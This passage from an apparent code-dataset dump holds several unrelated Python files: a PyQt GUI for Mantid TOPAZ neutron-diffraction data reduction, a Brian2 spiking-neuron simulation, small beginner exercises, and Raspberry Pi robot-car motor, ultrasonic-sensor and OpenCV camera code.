self.SAFile_ledt.text()\n\n def change_Fluxfile(self):\n self.FluxFile = self.FluxFile_ledt.text()\n\n def change_UBfile(self):\n self.UBFileName = str(self.UBFileName_ledt.text())\n if self.UBFileName != \"None\" and self.UBFileName != \"\":\n self.read_UB = True\n else:\n self.read_UB = False\n self.UBFileName = \"None\"\n\n def change_spectra_file(self):\n self.spectraFileName = self.spectraFileName_ledt.text()\n\n def change_file(self):\n self.backgroundFileName = self.BackgroundFileName_ledt.text()\n if self.backgroundFileName != \"None\" and self.backgroundFileName != \"\":\n self.subtract_bkg = True\n else:\n self.subtract_bkg = False\n self.backgroundFileName = \"None\"\n\n def change_cal_file(self):\n self.calFileName = self.CalFileName_ledt.text()\n if self.calFileName == \"\":\n self.calFileName = \"None\"\n\n def change_datadir(self):\n self.dataDirectory = self.dataDirectory_ledt.text()\n if self.dataDirectory == \"\":\n self.dataDirectory = \"None\"\n\n def Configbrowse_file(self):\n self.ConfigFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.config') # Filename line\n if self.ConfigFileName:\n self.ConfigFileName_ledt.setText(self.ConfigFileName)\n\n def SAbrowse_file(self):\n self.SAFile, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.nxs *.h5') # Filename line\n if self.SAFile:\n self.SAFile_ledt.setText(self.SAFile)\n\n def Fluxbrowse_file(self):\n self.FluxFile, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.nxs *.h5') # Filename line\n if self.FluxFile:\n self.FluxFile_ledt.setText(self.FluxFile)\n\n def UBbrowse_file(self):\n self.UBFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.mat') # Filename line\n if self.UBFileName:\n self.UBFileName_ledt.setText(self.UBFileName)\n\n def browse_spectra_file(self):\n self.spectraFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.dat') # Filename line\n if self.spectraFileName:\n 
self.spectraFileName_ledt.setText(self.spectraFileName)\n\n def browse_file(self):\n self.backgroundFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.nxs *.h5') # Filename line\n if self.backgroundFileName:\n self.BackgroundFileName_ledt.setText(self.backgroundFileName)\n\n def browse_cal_file(self):\n self.calFileName, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', '*.DetCal') # Filename line\n if self.calFileName:\n self.CalFileName_ledt.setText(self.calFileName)\n\n def browse_datadir(self):\n self.dataDirectory = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select Directory', '', options=QtWidgets.QFileDialog.ShowDirsOnly)\n if self.dataDirectory:\n self.dataDirectory_ledt.setText(self.dataDirectory)\n\n def change_pred_minDSpacing(self):\n self.pred_minDSpacing = self.toDouble(self.pred_minDSpacing_ledt.text())\n\n def change_pred_maxDSpacing(self):\n self.pred_maxDSpacing = self.toDouble(self.pred_maxDSpacing_ledt.text())\n\n def change_pred_minWavelength(self):\n self.pred_minWavelength = self.toDouble(self.pred_minWavelength_ledt.text())\n\n def change_pred_maxWavelength(self):\n self.pred_maxWavelength = self.toDouble(self.pred_maxWavelength_ledt.text())\n\n def change_minDSpacing(self):\n self.minDSpacing = self.toDouble(self.minDSpacing_ledt.text())\n\n def change_minWavelength(self):\n self.minWavelength = self.toDouble(self.minWavelength_ledt.text())\n\n def change_maxWavelength(self):\n self.maxWavelength = self.toDouble(self.maxWavelength_ledt.text())\n\n def change_sampleRadius(self):\n self.sampleRadius = self.toDouble(self.sampleRadius_ledt.text())\n\n def change_molecularFormula(self):\n self.molecularFormula = self.molecularFormula_ledt.text()\n\n def change_expName(self):\n self.expName = self.expName_ledt.text()\n\n def change_runNums(self):\n self.runNums = str(self.runNums_ledt.text())\n\n def change_Z(self):\n self.Z = self.toDouble(self.Z_ledt.text())\n\n def change_unitCellVolume(self):\n self.unitCellVolume = self.toDouble(self.unitCellVolume_ledt.text())\n\n def change_splitThreshold(self):\n temp = self.splitThreshold_ledt.text()\n self.splitThreshold = self.toInt(temp)\n\n def change_maxQ(self):\n self.maxQ = self.toDouble(self.maxQspace_ledt.text())\n try:\n self.maxQspace_ledt_2.setText(str(2*math.pi/self.maxQ))\n except:\n self.maxQspace_ledt_2.setText('')\n\n def change_maxQ2(self):\n #Dmin is specified instead of Qmax\n d = self.toDouble(self.maxQspace_ledt_2.text())\n try:\n self.maxQ = 2*math.pi/d\n self.maxQspace_ledt.setText(str(self.maxQ))\n except:\n self.maxQspace_ledt.setText('')\n \n def change_tolerance_satellite(self):\n self.tolerance_satellite = self.toDouble(self.tolerance_satellite_ledt.text())\n\n def change_mod_vec_1_dh(self):\n self.mod_vec_1_dh = self.toDouble(self.mod_vec_1_dh_ledt.text())\n \n def change_mod_vec_1_dk(self): \n self.mod_vec_1_dk = self.toDouble(self.mod_vec_1_dk_ledt.text())\n \n def change_mod_vec_1_dl(self): \n self.mod_vec_1_dl = self.toDouble(self.mod_vec_1_dl_ledt.text())\n \n def change_mod_vec_2_dh(self):\n self.mod_vec_2_dh = self.toDouble(self.mod_vec_2_dh_ledt.text())\n \n def change_mod_vec_2_dk(self): \n self.mod_vec_2_dk = self.toDouble(self.mod_vec_2_dk_ledt.text())\n \n def change_mod_vec_2_dl(self): \n self.mod_vec_2_dl = self.toDouble(self.mod_vec_2_dl_ledt.text())\n \n def change_mod_vec_3_dh(self):\n self.mod_vec_3_dh = self.toDouble(self.mod_vec_3_dh_ledt.text())\n \n def change_mod_vec_3_dk(self): \n self.mod_vec_3_dk = 
self.toDouble(self.mod_vec_3_dk_ledt.text())\n \n def change_mod_vec_3_dl(self): \n self.mod_vec_3_dl = self.toDouble(self.mod_vec_3_dl_ledt.text())\n\n def change_max_order(self): \n self.max_order = self.toInt(self.max_order_ledt.text())\n \n def change_cross_terms(self): \n self.cross_terms = self.toBool(self.cross_terms_chbx.isChecked())\n \n def change_save_mod_info(self): \n self.save_mod_info = self.toBool(self.save_mod_info_chbx.isChecked())\n \n def change_sat_peak_region_radius(self): \n self.sat_peak_radius = self.toDouble(self.sat_peak_region_radius_ledt.text())\n \n def change_sat_peak_radius(self): \n self.sat_peak_radius = self.toDouble(self.sat_peak_radius_ledt.text())\n\n def change_sat_peak_inner_radius(self): \n self.sat_peak_inner_radius = self.toDouble(self.sat_peak_inner_radius_ledt.text())\n\n def change_sat_peak_outer_radius(self): \n self.sat_peak_outer_radius = self.toDouble(self.sat_peak_outer_radius_ledt.text())\n \n def toBool(self, temp):\n try:\n result = bool(temp)\n except:\n result = None\n return result\n \n def toInt(self, temp):\n try:\n result = int(temp)\n except:\n result = None\n return result\n\n def toFloat(self, temp):\n # for python strings\n try:\n if type(temp) is float:\n return temp\n elif '.' in temp or \"e\" in temp:\n result = float(temp)\n else:\n temp_int = int(temp)\n result = float(temp_int)\n except:\n result = None\n return result\n\n def toDouble(self, temp):\n try:\n # for qt strings\n if str(\"%s\" % temp)==\"-\":\n return 0.\n if '.' in temp or \"e\" in temp:\n result = float(temp)\n else:\n temp_int = int(temp)\n result = float(temp_int)\n except:\n result = None\n return result\n \n def change_live(self, state):\n if state == QtCore.Qt.Checked:\n self.live = True\n else:\n self.live = False\n\n def plot_modStruct(self, state):\n if state == QtCore.Qt.Checked:\n self.modStruct = True\n else:\n self.modStruct = False\n\n def predict_peaks(self, state):\n if state == QtCore.Qt.Checked:\n self.predictPeaks = str( True)\n self.pred_minDSpacing_ledt.setEnabled(True)\n self.pred_maxDSpacing_ledt.setEnabled(True)\n self.pred_minWavelength_ledt.setEnabled(True)\n self.pred_maxWavelength_ledt.setEnabled(True)\n # self.mod_vec_1_dh_ledt.setEnabled(True)\n # self.mod_vec_1_dk_ledt.setEnabled(True)\n # self.mod_vec_1_dl_ledt.setEnabled(True)\n # self.mod_vec_2_dh_ledt.setEnabled(True)\n # self.mod_vec_2_dk_ledt.setEnabled(True)\n # self.mod_vec_2_dl_ledt.setEnabled(True)\n # self.mod_vec_3_dh_ledt.setEnabled(True)\n # self.mod_vec_3_dk_ledt.setEnabled(True)\n # self.mod_vec_3_dl_ledt.setEnabled(True)\n # self.max_order_ledt.setEnabled(True)\n # self.cross_terms_chbx.setEnabled(True)\n else:\n self.predictPeaks = str( False)\n self.pred_minDSpacing_ledt.setDisabled(True)\n self.pred_maxDSpacing_ledt.setDisabled(True)\n self.pred_minWavelength_ledt.setDisabled(True)\n self.pred_maxWavelength_ledt.setDisabled(True)\n # self.mod_vec_1_dh_ledt.setDisabled(True)\n # self.mod_vec_1_dk_ledt.setDisabled(True)\n # self.mod_vec_1_dl_ledt.setDisabled(True)\n # self.mod_vec_2_dh_ledt.setDisabled(True)\n # self.mod_vec_2_dk_ledt.setDisabled(True)\n # self.mod_vec_2_dl_ledt.setDisabled(True)\n # self.mod_vec_3_dh_ledt.setDisabled(True)\n # self.mod_vec_3_dk_ledt.setDisabled(True)\n # self.mod_vec_3_dl_ledt.setDisabled(True)\n # self.max_order_ledt.setDisabled(True)\n # self.cross_terms_chbx.setDisabled(True)\n \n def ellipse_size(self, state):\n if state == QtCore.Qt.Checked:\n self.ellipse_size_specified = str( True)\n else:\n 
self.ellipse_size_specified = str( False)\n\n def change_numPeaks(self):\n temp = self.numberPeaks_ledt.text()\n self.numPeaksToFind = self.toInt(temp)\n\n def change_minABC(self):\n self.abcMin = self.toDouble(self.minABC_ledt.text())\n\n def change_maxABC(self):\n self.abcMax = self.toDouble(self.maxABC_ledt.text())\n\n def change_tolerance(self):\n self.tolerance = self.toDouble(self.tolerance_ledt.text())\n\n def change_peakRadius(self):\n self.peakRadius = self.toDouble(self.peakRadius_ledt.text())\n\n def change_minIntensity(self):\n self.minIntensity = self.toDouble(self.minIntensity_ledt.text())\n\n def change_normToWavelength(self):\n self.normToWavelength = self.toDouble(self.normToWavelength_ledt.text())\n\n def change_minIsigI(self):\n self.minIsigI = self.toDouble(self.minIsigI_ledt.text())\n\n def change_starting_batch_number(self):\n temp = self.starting_batch_number_ledt.text()\n self.starting_batch_number = self.toInt(temp)\n\n def change_edgePixels(self):\n temp = self.edgePixels_ledt.text()\n self.edgePixels = self.toInt(temp)\n\n def change_borderPixels(self):\n temp = self.borderPixels_ledt.text()\n self.borderPixels = self.toInt(temp)\n\n def change_scaleFactor(self):\n self.scaleFactor = self.toDouble(self.scaleFactor_ledt.text())\n\n def reject(self):\n print (\"script has been killed\")\n os.killpg(os.getpgid(self.proc.pid), signal.SIGTERM)\n \n def accept(self):\n #Generate config file\n if (self.expName == ''):\n print (\"Enter an experiment name\")\n elif (self.molecularFormula == ''): \n print (\"Enter a valid molecular formula\")\n else:\n baseDir = os.getcwd()\n outDir = baseDir[:baseDir.find(\"shared\")]+\"shared/\"+self.expName\n print (\"Working directory: \",outDir)\n pg = self.pointGroup\n print (\"Point group: \",pg)\n kw = {\n \"molecularFormula\": self.molecularFormula,\n \"Z\": self.Z,\n \"unitCellVolume\": self.unitCellVolume,\n \"sampleRadius\": self.sampleRadius,\n \"instrument\": self.instrument,\n \"calFileName\": self.calFileName,\n \"maxQ\": self.maxQ,\n \"split_threshold\": self.splitThreshold,\n \"backgroundFileName\": self.backgroundFileName,\n \"subtract_bkg\": self.subtract_bkg,\n \"outputDirectory\": outDir,\n \"data_directory\": self.dataDirectory,\n \"UB_filename\": self.UBFileName,\n \"read_UB\": self.read_UB,\n \"centering\": self.centering,\n \"cell_type\": self.laueGroup,\n \"numPeaksToFind\": self.numPeaksToFind,\n \"abcMin\": self.abcMin,\n \"abcMax\": self.abcMax,\n \"tolerance\": self.tolerance,\n \"predictPeaks\": self.predictPeaks,\n \"min_pred_dspacing\": self.pred_minDSpacing,\n \"max_pred_dspacing\": self.pred_maxDSpacing,\n \"min_pred_wl\": self.pred_minWavelength,\n \"max_pred_wl\": self.pred_maxWavelength,\n \"peak_radius\": self.peakRadius,\n \"bkg_inner_radius\": self.bkg_inner_radius,\n \"bkg_outer_radius\": self.bkg_outer_radius,\n \"ellipse_size_specified\": self.ellipse_size_specified,\n \"n_bad_edge_pixels\": self.edgePixels,\n \"exp_name\": self.expName,\n \"run_nums\": self.runNums,\n \"spectraFileName\": self.spectraFileName,\n \"normToWavelength\": self.normToWavelength,\n \"minIsigI\": self.minIsigI,\n \"numBorderCh\": self.borderPixels,\n \"minIntensity\": self.minIntensity,\n \"min_dspacing\": self.minDSpacing,\n \"scaleFactor\": self.scaleFactor,\n \"min_wl\": self.minWavelength,\n \"max_wl\": self.maxWavelength,\n \"pg_symbol\": pg,\n \"z_score\": self.z_score,\n \"starting_batch_number\": self.starting_batch_number,\n \"tolerance_satellite\": self.tolerance_satellite,\n \"mod_vector1\": 
\"{},{},{}\".format(self.mod_vec_1_dh, self.mod_vec_1_dk, self.mod_vec_1_dl),\n \"mod_vector2\": \"{},{},{}\".format(self.mod_vec_2_dh, self.mod_vec_2_dk, self.mod_vec_2_dl),\n \"mod_vector3\": \"{},{},{}\".format(self.mod_vec_3_dh, self.mod_vec_3_dk, self.mod_vec_3_dl),\n \"max_order\": self.max_order,\n \"cross_terms\": self.cross_terms,\n \"save_mod_info\": self.save_mod_info,\n \"satellite_peak_size\": self.sat_peak_radius,\n \"satellite_region_radius\": self.sat_peak_region_radius,\n \"satellite_background_inner_size\": self.sat_peak_inner_radius,\n \"satellite_background_outer_size\": self.sat_peak_outer_radius,\n }\n # if value in dictionary is missing, set to None\n for key in list(kw.keys()):\n if not kw[key]:\n kw[key] = \"None\"\n\n templatePath = \"./mod3/example_sat_q00_0q0_bkg.config\"\n self.path = self.expName+\".config\"\n self.format_template(templatePath, self.path, **kw)\n self.plotConfig()\n\n def plotConfig(self):\n import configparser\n \n filename = './plotConfig.ini'\n baseDir = os.getcwd()\n UBDirectory = baseDir[:baseDir.find(\"shared\")]+\"shared/\"+self.expName + \"/\" \n config = configparser.ConfigParser()\n config['PLOT1'] = {'axis1': self._h1,\n 'axis2': self._k1,\n 'axis3': self._l1,\n 'xmin': self._xmin1,\n 'xmax': self._xmax1,\n 'xsteps': self._xsteps1,\n 'ymin': self._ymin1,\n 'ymax': self._ymax1,\n 'ysteps': self._ysteps1,\n 'zmin': self._zmin1,\n 'zmax': self._zmax1}\n config['PLOT2'] = {'axis1': self._h2,\n 'axis2': self._k2,\n 'axis3': self._l2,\n 'xmin': self._xmin2,\n 'xmax': self._xmax2,\n 'xsteps': self._xsteps2,\n 'ymin': self._ymin2,\n 'ymax': self._ymax2,\n 'ysteps': self._ysteps2,\n 'zmin': self._zmin2,\n 'zmax': self._zmax2}\n config['PLOT3'] = {'axis1': self._h3,\n 'axis2': self._k3,\n 'axis3': self._l3,\n 'xmin': self._xmin3,\n 'xmax': self._xmax3,\n 'xsteps': self._xsteps3,\n 'ymin': self._ymin3,\n 'ymax': self._ymax3,\n 'ysteps': self._ysteps3,\n 'zmin': self._zmin3,\n 'zmax': self._zmax3}\n config['REDUCTION'] = {'CalFile': self.calFileName,\n 'UBDirectory': UBDirectory}\n config['NORMALIZATION'] = {'SAFile': self.SAFile,\n 'FluxFile': self.FluxFile}\n with open(filename, 'w') as configfile:\n config.write(configfile)\n \n\n\n def auto(self):\n self.accept()\n baseDir = os.getcwd()\n timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n autoConfig = baseDir[:baseDir.find(\"shared\")]+\"shared/autoreduce/autoreduce\"+timestr+\".config\"\n copyfile(self.path, autoConfig)\n autoPlotConfig = baseDir[:baseDir.find(\"shared\")]+\"shared/autoreduce/plotConfig\"+timestr+\".ini\"\n\n copyfile('./plotConfig.ini', autoPlotConfig)\n \n\n def run(self):\n self.accept()\n if self.live is True:\n self.proc = Popen(['/bin/mantidpythonnightly','runMantidEV.py', str(self.path)])\n else:\n self.proc = Popen(['/bin/mantidpythonnightly','mod3/topaz_reduction_mod.py', str(self.path)])\n if self.modStruct:\n self.proc.wait()\n Popen(['/bin/mantidpythonnightly','ModulatedStructurePlot.py', str(self.path)])\n\ndef main():\n app = QtWidgets.QApplication(sys.argv) # A new instance of QApplication\n form = MantidReduction() # We set the form to be our MantidReduction (design)\n form.show() # Show the form\n app.exec_() # and execute the app\n os.system('stty sane')\n\n\nif __name__ == '__main__': # if we're running file directly and not importing it\n main() # run the main 
function\n","sub_path":"TOPAZ/ReductionGUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":49320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"356975102","text":"from brian2 import *\n\n\nnum_neurons = 3\nduration = 200*ms\n\n# Parameters\na = 0.1/ms #reflects recovery timescale\nb = 0.2 # smaller values couple v and u more closely\nc = -65.0 #resting potential\nd = 2 #after spike recovery of u\ntau_m=2*ms\ntau_ampa=3*ms\ng_peak=4\ng_peak_in = -4\ntranswdth=1.0*ms\n\n#The model\n#to add noise +5*xi*tau_m**.5/ms\neqs = '''\ndv/dt = (0.04*(v**2) + 5*v + 140 - u + I + g_ampa + g_gaba)/ms : 1\ndu/dt = a * ((b*v) - u) : 1\n\ndg_ampa/dt = (-g_ampa/tau_ampa*ms + z)/ms: 1 \ndz/dt = (-z/tau_ampa + g_syn*Tr_pre/ms) : 1 \ng_syn = g_peak / (tau_ampa/ms*exp(-1)): 1\nTr_pre=.25*(tanh((t/ms-tspike/ms)/.005)-tanh((t/ms-(tspike/ms +transwdth/ms))/.005)):1\n\ndg_gaba/dt = -g_gaba/tau_ampa + zg/ms: 1 \ndzg/dt = (-zg/tau_ampa + gg_syn*Tr_pre/ms) : 1 \ngg_syn = g_peak_in / (tau_ampa/ms*exp(-1)): 1\n\nI : 1\ntspike :second\n'''\n#\n# Threshold and refractoriness are only used for spike counting\ngroup = NeuronGroup(num_neurons, eqs,\n threshold='v > 30',\n refractory='v > 40',\n reset='''v = c\n u=u+d\n tspike = t\n ''')\n\ngroup.v = c\ngroup.u = 0\ngroup.I = [10,0,8]\ngroup.g_ampa = 0\ngroup.g_gaba = 0\ngroup.tspike=-100.0*ms\n\nS = Synapses(group, group, on_pre='''\ng_ampa_post += 0\nz_post += g_peak\n''')\nS.connect(i=0, j=1)\ninS = Synapses(group, group, on_pre='''\nzg_post += -g_peak\ng_gaba_post += 0\n''')\ninS.connect(i=1, j=2)\n\n\nmonitor = SpikeMonitor(group)\nmonitor2 = StateMonitor(group, ('v', 'g_ampa', 'g_gaba'), record=True)\nrun(duration)\n\nfigure(figsize=(12,4))\nsubplot(3,1,1)\nxlim(0,100)\nylabel('Membrane potential')\nxlabel('t(ms)')\nplot(monitor2.t/ms, monitor2.v[0]) #plot the voltage for neuron 0 (index starts at 0)\nsubplot(3,1,2)\nxlim(0,100)\nylabel('Membrane potential')\nxlabel('t(ms)')\nplot(monitor2.t/ms, monitor2.v[1])\nsubplot(3,1,3)\n\nplot(monitor2.t/ms, monitor2.v[2]) \nxlim(0,100)\nylabel('Membrane potential')\nxlabel('t(ms)')\n\n\n#figure(2)\n#plot(monitor2.t/ms, monitor2.v[0]/mV) #plot the voltage for neuron 0 (index starts at 0)\n#ylim(-80,60) #set axes limits\n\nshow()","sub_path":"BME modeling/code/2_iz_connect.py","file_name":"2_iz_connect.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"52368004","text":"class clock:\n def __init__(self, hour, min, sec ):\n self.hour = hour\n self.min = min\n self.sec = sec\n\n def GetTime(self):\n return self.hour, self.min, self.sec \n\n\n def SetTime(self, hour, min, sec):\n self.hour = hour\n self.min = min\n self.sec = sec\n\n\nC1 = clock(3, 20, 0)\nC2 = clock(2, 20, 0)\nC3 = clock(4, 20, 0)\nC4 = clock(5, 20, 0)\nC5 = clock(6, 20, 0)\nC6 = clock(7, 20, 0)\n\n\nprint(C3.GetTime())\n\n\n","sub_path":"Jaar 1/OP3/ANAL3/WEEK1/programmes/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"522092432","text":"\"\"\"\nPeça um número ao usuário e, em seguida, informe se o\nnúmero é múltiplo de dez ou não.\n\"\"\"\n\nnúmero = int(input(\"Digite um número: \"))\n\nif número % 10 == 0:\n print(str(número) + \" é multiplo de 10\")\nelse:\n print(str(número) + \" não é multiplo de 10\")","sub_path":"FAÇA VOCÊ MESMO/7.3_multiplos_de_dez.py","file_name":"7.3_multiplos_de_dez.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"407357853","text":"num = int(input())\nfor i in range(num):\n number=int(input())\n TList=input().split()\n CanList=list(set(TList))\n TNList=[]\n count=0\n for candidate in CanList:\n TNList.append(0)\n for index in range(len(TList)):\n if candidate==TList[index]:\n TNList[count]=TNList[count]+1\n count=count+1\n\n for j in range(len(TNList)):\n for l in range(len(TNList) - 1):\n if TNList[l] < TNList[l + 1]:\n temp = TNList[l]\n TNList[l] = TNList[l + 1]\n TNList[l + 1] = temp\n\n temp = CanList[l]\n CanList[l] = CanList[l + 1]\n CanList[l + 1] = temp\n\n MaxCan=[]\n MaxCan.append(CanList[0])\n for nI in range(len(TNList)-1):\n if TNList[nI]!=TNList[nI+1]:\n break\n elif TNList[nI]==TNList[nI+1]:\n MaxCan.append(CanList[nI+1])\n MaxCan.sort()\n print(MaxCan[0]+' '+str(TNList[0]))","sub_path":"Code/CodeRecords/2487/60625/247200.py","file_name":"247200.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"108480526","text":"import cv2\r\nimport numpy as np\r\nimport RPi.GPIO as GPIO #control motor board through GPIO pins\r\nimport time #set delay time to control moving distance\r\n\r\nGPIO.setwarnings(False)\r\n#If INL1=True and INL2=False left motor move forward, If INL1=False,INL2=True left motor move backward,in other cases left motor stop(M1)\r\nINL1 = 13 #GPIO27 to IN1 Front-left wheel direction\r\nINL2 = 15 #GPIO22 to IN2 Front-left wheel direction\r\n\r\n#If INL3=True and INL4=False left motor move forward, If INL3=False,INL4=True left motor move backward,in other cases left motor stop(M2)\r\n\r\nINL3 = 16 #GPIO23 to IN3 Rear-left wheel direction\r\nINL4 = 18 #GPIO24 to IN4 Rear-left wheel direction\r\n\r\n#ENA/ENB are PWM(analog) signal pin which control the speed of left motors through GPIO ChangeDutyCycle(speed) function\r\nENAL = 11 #GPIO17 to ENA PWM SPEED of M1 motor\r\nENBL = 22 #GPIO25 to ENB PWM SPEED of M2 motor\r\n\r\n#If INR1=True and INR2=False right motor move forward, If INL1=False,INL2=True right motor move backward,in other cases right motor stop(M3)\r\n\r\nINR1 = 21 #GPIO9 to IN1 Front-right wheel direction\r\nINR2 = 23 #GPIO11 to IN2 Front-right wheel direction\r\n\r\n\r\n#If INR3=True and INR4=False right motor move forward, If INR1=False,INR2=True right motor move backward,in other cases right motor stop(M4)\r\nINR3 = 24 #GPIO8 to IN3 Rear-right wheel direction\r\nINR4 = 26 #GPIO7 to IN4 Rear-right wheel direction\r\n\r\n#ENA/ENB are PWM(analog) signal pin which control the speed of right motors through GPIO ChangeDutyCycle(speed) function\r\nENAR = 19 #GPIO10 to ENA PWM SPEED of M3 motor\r\nENBR = 32 #GPIO12 to ENB PWM SPEED of M4 motor\r\n\r\n#ultrasonic sensor\r\nTRIG = 29\r\nECHO = 31\r\n\r\n#initialize GPIO pins, tell OS which pins will be used to control Model-Pi L298N board\r\nGPIO.setmode(GPIO.BOARD)\r\nGPIO.setup(TRIG,GPIO.OUT)\r\nGPIO.setup(ECHO,GPIO.IN)\r\nGPIO.setup(INR1, GPIO.OUT)\r\nGPIO.setup(INR2, GPIO.OUT)\r\nGPIO.setup(INR3, GPIO.OUT)\r\nGPIO.setup(INR4, GPIO.OUT)\r\nGPIO.setup(ENAL, GPIO.OUT)\r\nGPIO.setup(ENBL, GPIO.OUT)\r\nGPIO.setup(ENAR, GPIO.OUT)\r\nGPIO.setup(ENBR, GPIO.OUT)\r\nGPIO.setup(INL1, GPIO.OUT)\r\nGPIO.setup(INL2, GPIO.OUT)\r\nGPIO.setup(INL3, GPIO.OUT)\r\nGPIO.setup(INL4, GPIO.OUT)\r\nGPIO.output(ENAL,True)\r\nGPIO.output(ENBL,True)\r\nGPIO.output(ENAR,True)\r\nGPIO.output(ENBR,True)\r\n\r\n\r\n#make front right motor moving forward\r\ndef fr_ahead(speed):\r\n GPIO.output(INR1,True)\r\n GPIO.output(INR2,False)\r\n\r\n#make rear right motor moving forward \r\ndef rr_ahead(speed): \r\n GPIO.output(INR3,True)\r\n GPIO.output(INR4,False)\r\n \r\n#make front right motor moving backward\r\ndef fr_back(speed):\r\n GPIO.output(INR2,True)\r\n GPIO.output(INR1,False)\r\n\r\n#make rear right motor moving backward \r\ndef rr_back(speed): \r\n GPIO.output(INR4,True)\r\n GPIO.output(INR3,False) \r\n \r\n#make front left motor moving forward\r\ndef fl_ahead(speed):\r\n GPIO.output(INL1,True)\r\n GPIO.output(INL2,False)\r\n\r\n#make rear left motor moving forward \r\ndef rl_ahead(speed): \r\n GPIO.output(INL3,True)\r\n GPIO.output(INL4,False)\r\n \r\n \r\n#make Front left motor moving backward\r\ndef fl_back(speed):\r\n GPIO.output(INL2,True)\r\n GPIO.output(INL1,False)\r\n\r\n#make rear left motor moving backward \r\ndef rl_back(speed): \r\n GPIO.output(INL4,True)\r\n GPIO.output(INL3,False)\r\n\r\n \r\ndef go_ahead(speed):\r\n rr_ahead(speed)\r\n fl_ahead(speed)\r\n fr_ahead(speed)\r\n rl_ahead(speed)\r\n \r\ndef 
go_back(speed):\r\n rr_back(speed)\r\n rl_back(speed)\r\n fr_back(speed)\r\n fl_back(speed)\r\n\r\n#making right turn \r\ndef turn_right(speed):\r\n rr_back(speed)\r\n fr_back(speed)\r\n fl_ahead(speed)\r\n rl_ahead(speed)\r\n \r\n#make left turn\r\ndef turn_left(speed):\r\n fl_back(speed)\r\n rl_back(speed)\r\n fr_ahead(speed)\r\n rr_ahead(speed)\r\n\r\n# parallel left shift\r\ndef shift_left(speed):\r\n fl_back(speed)\r\n rr_back(speed)\r\n rl_ahead(speed)\r\n fr_ahead(speed)\r\n\r\n# parallel right shift\r\ndef shift_right(speed):\r\n fr_back(speed)\r\n fl_ahead(speed)\r\n rl_back(speed)\r\n rr_ahead(speed)\r\n\r\ndef upper_right(speed):\r\n fl_ahead(speed)\r\n rr_ahead(speed)\r\n\r\ndef lower_left(speed):\r\n rr_back(speed)\r\n fl_back(speed)\r\n \r\ndef upper_left(speed):\r\n fr_ahead(speed)\r\n rl_ahead(speed)\r\n\r\ndef lower_right(speed):\r\n fr_back(speed)\r\n rl_back(speed)\r\n\r\n#make both motor stop\r\ndef stop_car():\r\n GPIO.output(INR1,False)\r\n GPIO.output(INR2,False)\r\n GPIO.output(INR3,False)\r\n GPIO.output(INR4,False)\r\n GPIO.output(INL1,False)\r\n GPIO.output(INL2,False)\r\n GPIO.output(INL3,False)\r\n GPIO.output(INL4,False)\r\n\r\ndef callback(x):\r\n pass\r\n\r\ndef ultra():\r\n GPIO.output(TRIG, False)\r\n #print (\"Waiting For Sensor To Settle\")\r\n time.sleep(0.05)\r\n \r\n GPIO.output(TRIG, True)\r\n time.sleep(0.00001)\r\n GPIO.output(TRIG, False)\r\n \r\n while GPIO.input(ECHO)==0:\r\n pulse_start = time.time()\r\n \r\n while GPIO.input(ECHO)==1:\r\n pulse_end = time.time()\r\n \r\n pulse_duration = pulse_end - pulse_start\r\n \r\n distance = pulse_duration * 17150\r\n \r\n distance = round(distance, 2)\r\n \r\n # print (\"Distance: \",distance,\"cm\")\r\n return distance\r\n\r\n\r\n# go_ahead(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# go_back(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# turn_left(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# turn_right(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# shift_right(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# shift_left(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# upper_left(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# lower_right(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# upper_right(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# lower_left(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# GPIO.cleanup() \r\ncap = cv2.VideoCapture(0)#0-laptop webcam , 1-additional webcam\r\ncap.set(3,480)\r\ncap.set(4,320)\r\n\r\n_,frame=cap.read()\r\n\r\nrows,cols,_=frame.shape\r\nx_middle=int(cols/2)\r\ny_middle=int(rows/2)\r\n\r\n#display text\r\nx_center=x_middle\r\ny_center=y_middle\r\norg=(50, 50)\r\nfont=cv2.FONT_HERSHEY_SIMPLEX\r\nfontScale = 1\r\ncolor =(0,255,255)\r\nthickness=2\r\n\r\narea = 450.0\r\ncv2.namedWindow('HSV_TRACKBAR')\r\n\r\n#redcolor\r\nilowH = 51\r\nihighH = 81\r\n\r\nilowS = 31\r\nihighS = 255\r\nilowV = 117\r\nihighV = 255\r\n\r\n# create trackbars for color 